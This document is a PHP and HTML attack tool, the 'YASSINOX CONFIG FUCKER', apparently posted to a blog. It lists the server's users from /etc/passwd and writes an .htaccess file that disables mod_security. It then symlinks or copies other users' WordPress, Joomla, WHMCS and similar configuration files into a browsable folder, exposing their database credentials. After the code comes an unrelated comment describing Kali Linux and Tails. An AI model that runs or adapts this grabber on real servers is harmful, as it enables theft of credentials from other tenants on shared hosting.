<style type=text/css>
.rules
{text-shadow:5px 5px 10px red;}
.owner
{text-shadow:5px 5px 10px orange;}
.mod
{text-shadow:5px 5px 10px white;}
.member
{text-shadow:5px 5px 10px blue;}
.guest
{text-shadow:5px 5px 10px green;}
.tags
{text-shadow:5px 5px 10px grey;}
.title
{text-shadow:5px 5px 10px purple;}
.numbers
{text-shadow:1px 5px 10px white;}
body {background-color: transparent;color: #FFFFFF;}
</style>
<br>
<br>
<center> <!-- IE doesn't like CSS Centering -->
<table border="0">
<table bgcolor="black" border="1">
<tr onmouseover="this.bgColor='#FF8000'" onmouseout="this.bgColor='#000000'">
<th>
<br>
<span style="text-shadow:5px 5px 10px red;"><font size="7">YASSINOX CONFIG FUCKER</font></span>
</th>
</tr>
<td>
<table border="1" bgcolor="black" align="center">
<tr onmouseover="this.bgColor='#FF8000'" onmouseout="this.bgColor='#000000'">
<th width="481" class="title"><span style="text-shadow:5px 5px 10px red;">Normal Grabber</span></th>
<th width="514" class="title"><span style="text-shadow:5px 5px 10px red;">Bypass Grabber</span></th>
</tr>
</tr><tr onmouseover="this.bgColor='#FF8000'" onmouseout="this.bgColor='#000000'">
<td>
<span style="font-weight: bold; color: blue;"> ~ Users ~</span><br><br>
<br>
<form method=post>
<textarea rows=10 cols=50 name=usern><?php
$users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
echo $str[0]."\n";
}
?></textarea><br><br>
<center><input type=submit name=submitn value="Grab It " /></form></center>
</td>
<td>
<table border="1" cellpadding="1" width="514" height="300" bgcolor="black"></td>
</tr>
<span style="font-weight: bold; color: blue;"> ~ Users ~</span><br><br>
<form method=post>
<textarea rows=10 cols=50 name=userb><?php
$users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
echo $str[0]."\n";
}
?></textarea><br><br>
<center><input type=submit name=submitb value="Bypass It " /></form></center>
</td>
</td>
</tr>
</table></table></table>
<td>
</center>
<?php
if(isset($_POST['submitn']))
{
mkdir('yassinoxnormal',0777); //This Will Make A Directory Where The config Will be
//-------------------------------------------------------------------------------------
$htaccess = "OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI \nOptions Indexes FollowSymLinks \nForceType text/plain \nAddType text/plain .php \nAddType text/plain .html \nAddType text/html .shtml \nAddType txt .php \nAddHandler server-parsed .php \nAddHandler server-parsed .shtml \nAddHandler txt .php \nAddHandler txt .html \nAddHandler txt .shtml \nOptions All \nOptions All \n<IfModule mod_security.c> \nSecFilterEngine Off \nSecFilterScanPOST Off \nSecFilterCheckURLEncoding Off \nSecFilterCheckCookieFormat Off \nSecFilterCheckUnicodeEncoding Off \nSecFilterNormalizeCookies Off \n</IfModule>"; // Htaccess By Mauritania Attacker <3
$htaccessfile = fopen("yassinoxnormal/.htaccess",'w');
fwrite($htaccessfile,$htaccess);
//-------------------------------------------------------------------------------------
$admin = explode("\n",$_POST['usern']);
$needconfig = array("wp-config.php","/blog/wp-config.php","wordpress/wp-config.php","wp/wp-config.php","site/wp-config.php","site/blog/wp-config.php","configuration.php","site/configuration.php","joomla/configuration.php","home/configuration.php","vb/includes/config.php","/includes/config.php","forum/includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php","/include/config.php","/commun/config.php","/include/sql.php","/include/db.php","/db.php","/commun/sql.php","/common/db.php","/common/sql.php","/common/config.php");
foreach($admin as $admins )
{
$ad=trim($admins);
foreach($needconfig as $config)
{
$direct = "/home/".$ad."/public_html/".$config;
$import = "yassinoxnormal/".$ad."_".$config;
symlink($direct,$import);
}
}
echo '<center><span style="text-shadow:5px 5px 10px red;"><font size="4" color="black">--> <a href="yassinoxnormal/">Configuration Files</a> <--</font></span></center>';
}
?>
<?php
if(isset($_POST['submitb']))
{
mkdir('yassinoxbypass',0777); //This Will Make A Directory Where The config Will be
//-------------------------------------------------------------------------------------
$htaccess = "OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI \nOptions Indexes FollowSymLinks \nForceType text/plain \nAddType text/plain .php \nAddType text/plain .html \nAddType text/html .shtml \nAddType txt .php \nAddHandler server-parsed .php \nAddHandler server-parsed .shtml \nAddHandler txt .php \nAddHandler txt .html \nAddHandler txt .shtml \nOptions All \nOptions All \n<IfModule mod_security.c> \nSecFilterEngine Off \nSecFilterScanPOST Off \nSecFilterCheckURLEncoding Off \nSecFilterCheckCookieFormat Off \nSecFilterCheckUnicodeEncoding Off \nSecFilterNormalizeCookies Off \n</IfModule>"; // Htaccess By Mauritania Attacker <3
$htaccessfile = fopen("yassinoxbypass/.htaccess",'w');
fwrite($htaccessfile,$htaccess);
//-------------------------------------------------------------------------------------
$admin = explode("\n",$_POST['usern']);
$needconfig = array("wp-config.php","/blog/wp-config.php","wordpress/wp-config.php","wp/wp-config.php","site/wp-config.php","site/blog/wp-config.php","configuration.php","site/configuration.php","joomla/configuration.php","home/configuration.php","vb/includes/config.php","/includes/config.php","forum/includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php","/include/config.php","/commun/config.php","/include/sql.php","/include/db.php","/db.php","/commun/sql.php","/common/db.php","/common/sql.php","/common/config.php");
foreach($admin as $admins )
{
$ad=trim($admins);
foreach($needconfig as $config)
{
$direct = "../../".$ad."/public_html/".$config;
$import = "yassinoxbypass/".$ad."_".$config;
copy($direct,$import);
}
}
echo '<center><span style="text-shadow:5px 5px 10px red;"><font size="4" color="black">--> <a href="yassinoxbypass/">Configuration Files</a> <--</font></span></center>';
}
?>
JuanDeLemos: 1. Kali Linux http://distrowatch.com/kali http://www.kali.org/ http://forums.kali.org/ Kali Linux (formerly known as BackTrack) is a Debian-based distribution with a collection of security and forensics tools. It features timely security updates, support for the ARM architecture, a choice of four popular desktop environments, and seamless upgrades to newer versions. 2. Tails http://distrowatch.com/tails https://tails.boum.org/ https://tails.boum.org/support/index.en.html https://mailman.boum.org/listinfo/ The Amnesic Incognito Live System (Tails) is a Debian-based live CD/USB with the goal of providing complete Internet anonymity for the user. The product ships with several Internet applications, including web browser, IRC client, mail client and instant messenger, all pre-configured with security in mind and with all traffic anonymised. To achieve this, Incognito uses the Tor network to make Internet traffic very hard to trace...
Comments
Post a Comment